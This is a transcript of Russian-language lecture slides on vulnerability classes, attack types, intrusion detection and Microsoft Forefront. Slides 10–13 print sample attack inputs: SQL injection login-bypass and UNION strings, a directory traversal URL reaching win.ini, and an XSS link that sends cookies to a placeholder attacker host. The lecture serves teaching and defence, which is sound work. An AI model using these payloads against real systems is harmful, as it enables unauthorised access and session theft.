1 / 24

Технологии и продукты Microsoft в обеспечении ИБ

Лекция 16 . Анализ защищённости информационной системы на основе выявления уязвимостей и обнаружения вторжений. Технологии и продукты Microsoft в обеспечении ИБ. Цели. striDe. Изучить классификацию уязвимостей, информационных атак и их возможных последствий.

stone-caldwell
Download Presentation

Технологии и продукты Microsoft в обеспечении ИБ

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Лекция 16. Анализ защищённости информационной системы на основе выявления уязвимостей и обнаружения вторжений Технологии и продукты Microsoft в обеспечении ИБ

  2. Цели striDe • Изучить классификацию уязвимостей, информационных атак и их возможных последствий. • Рассмотреть различные типы технологических и эксплуатационных уязвимостей программно-аппаратного обеспечения АС. • Изучить основные способы реализации информационных атак. • Научиться отличать сетевые и хостовые системы анализа защищённости. • Познакомиться с методами сбора и анализа информации, реализуемые в системах анализа защищённости.

  3. Уязвимость - «ахиллесова пята» информационных систем

  4. От чего защищать?

  5. Типы уязвимостей • Технологические уязвимости • Уязвимость типа «переполнение буфера» • Уязвимость типа «SQL Injection» • Уязвимость типа «format string» • Эксплуатационные уязвимости • Неправильная настройка сетевых сервисов АС • Использование слабых и нестойких к угадыванию паролей доступа • Отсутствие установленных модулей обновления программного обеспечения (Service Packs, HotFixes, и т.д.)

  6. Классификация уязвимостей АС

  7. Технологическая уязвимость типа«переполнение буфера»

  8. Источники уязвимостей типа «buffer overflow» • программы, которые запускаются локально на хосте • сетевые приложения, которые обеспечивают интерактивное взаимодействие с пользователем на основе сетевых протоколов. Примером сетевых программ являются Web-приложения, такие как CGI-модули, PHP-сценарии, активные серверные страницы ASP и др. • хранимые процедуры серверов СУБД

  9. Технологическая уязвимость «SQL Injection» • Уязвимости типа «SQL Injection» («инъекция в SQL-запросы») позволяют нарушителю выполнять несанкционированные операции над содержимым баз данных SQL-серверов путём вставки дополнительных команд в SQL-запросы • Уязвимость «SQL Injection» заключается в отсутствии проверки корректности данных, поступающих на вход программе, что потенциально может позволить нарушителю составить входные данные таким образом, что приведёт к искажению искомого SQL-запроса к СУБД

  10. Активизация уязвимости «SQL Injection» с целью получения НСД SQLQuery = "SELECT Username FROM Users WHERE Username = '" & strUsername & "' AND Password = '" & strPassword & "'" strAuthCheck = GetQueryResult(SQLQuery) If strAuthCheck = "" Then boolAuthenticated = False Else boolAuthenticated = True End If «SELECT Username FROM Users WHERE Username = ''OR ''='' AND Password = ''OR ''=''» (полужирным шрифтом выделены команды, которые внедряются нарушителем в исходный SQL-запрос).

  11. Активизация уязвимости «SQL Injection» с целью извлечения данных SQLString = "SELECT FirstName, LastName FROM Employees WHERE City = '" & strCity & "'« SELECT FirstName, LastName FROM Employees WHERE City = '' UNION ALL SELECT OtherField FROM OtherTable WHERE ''=''

  12. Технологическая уязвимость «Directory traversal» Уязвимости типа «Directory traversal» («просмотр директорий») могут позволить злоумышленнику получить несанкционированный доступ к файловым ресурсам сервера в обход установленных правил разграничения доступа «http://192.168.0.1/getnews.asp?item=../../../../WINNT/win.ini»

  13. Технологическая уязвимость «Cross Site Scripting» Уязвимости типа «Cross Site Scripting» («межсайтовое выполнение сценариев») характерны для серверных Web-приложений, не предусматривающих проверку синтаксиса входных данных, на основе которых формируются HTML-документы, отправляемые пользователям «<A HREF="http://www.server.ru/ShowError.asp? error_text= <script>document.location. replace('http://hacker.org/steal.cgi?+document.cookie');</script>">Link Text </A>»

  14. Уязвимости реализаций стека TCP/IP Уязвимости реализаций стека TCP/IP связаны с ошибками, которые допускаются программистами на этапе реализации программных модулей, отвечающих за обработку входящих и исходящих пакетов данных Пример уязвимости данного типа – атака «Land» хост хост

  15. Жизненный цикл атаки

  16. Типы информационных атак

  17. Инструментальный анализ защищенности Для чего предназначен: • Инвентаризация ресурсов сети (устройства, ОС, службы, ПО) • Идентификация и анализ технологических уязвимостей • Подготовка отчетов, описание проблем и методов устранения Типы используемых для анализа средств: • Сетевые сканеры безопасности • Хостовые сканеры безопасности (проверка ОС и приложений) • Утилиты удаленного администрирования • Утилиты для верификации найденных уязвимостей • Утилиты для инвентаризации ресурсов

  18. Сбор информации • Сетевые датчики предназначены для сбора информации о пакетах данных, передаваемых в том сегменте ИС, где установлен датчик • Хостовые датчики устанавливаются на определённые компьютеры в ИС и предназначаются для сбора информации о событиях, возникающих на этих компьютерах

  19. Анализ информации • Сигнатурные методы описывают каждую атаку в виде специальной модели или сигнатуры. В качестве сигнатуры атаки могут выступать: • строка символов • семантическое выражение на специальном языке • формальная математическая модель и т.д. • Поведенческие методы отслеживают несоответствия между текущим режимом функционирования ИС и моделью штатного режима работы, заложенной в параметрах метода

  20. Microsoft Forefront • Всесторонняя защита бизнес-приложений, позволяющая достичь лучшей защиты и безопасного доступа посредством глубокой интеграции и упрощенного управления Защита клиентской и серверной ОС Защита серверных приложений Защита периметра

  21. Система предотвращения вторжений • Forefront Network Inspection System (NIS) • Сигнатуры, основанные на уязвимостях • Основана на GAPA от Microsoft Research • Generic Application Level Protocol Analyzer • Платформа для быстрого низкоуровневого сканирования • Расширяема • Security assessment and response (SAS) • Моделирование, основанное на поведении

  22. Система предотвращения вторжений • Основанная на сигнатурах • Определяет и противостоит атакам из интернета, основанным на уязвимостях • Определяет и предупреждает о «внутренних» компьютерах, которые ведут атаки • Основанная на анализе поведения • «Найди то, не знаю что» • Отслеживает поведение систем и определяет потенциально зловредные компоненты сети • Может противодействовать угрозе на основании политики

  23. Использованныеисточники • Сердюк В.А. Уязвимость - «Ахиллесова пята» современных информационных систем «BYTE/Россия», 2004, №4 (68), стр. 19-22. • Сердюк В.А. Вы атакованы – защищайтесь (методология выявления атак) //«BYTE/Россия», 2003, №9 (61), стр. 61-64 • Сердюк В.А. Новое в защите от взлома корпоративных систем. Техносфера; 2007. • Калихман Р. Forefront Client Security: технический обзор // Microsoft, слайды.Опубликовано: https://msdb.ru/Downloads/f/d5214ed0-b831-4e27-b85c-ad61a700ea45/1_FCS_overview.pdf

  24. Спасибо за внимание! Вопросы?

More Related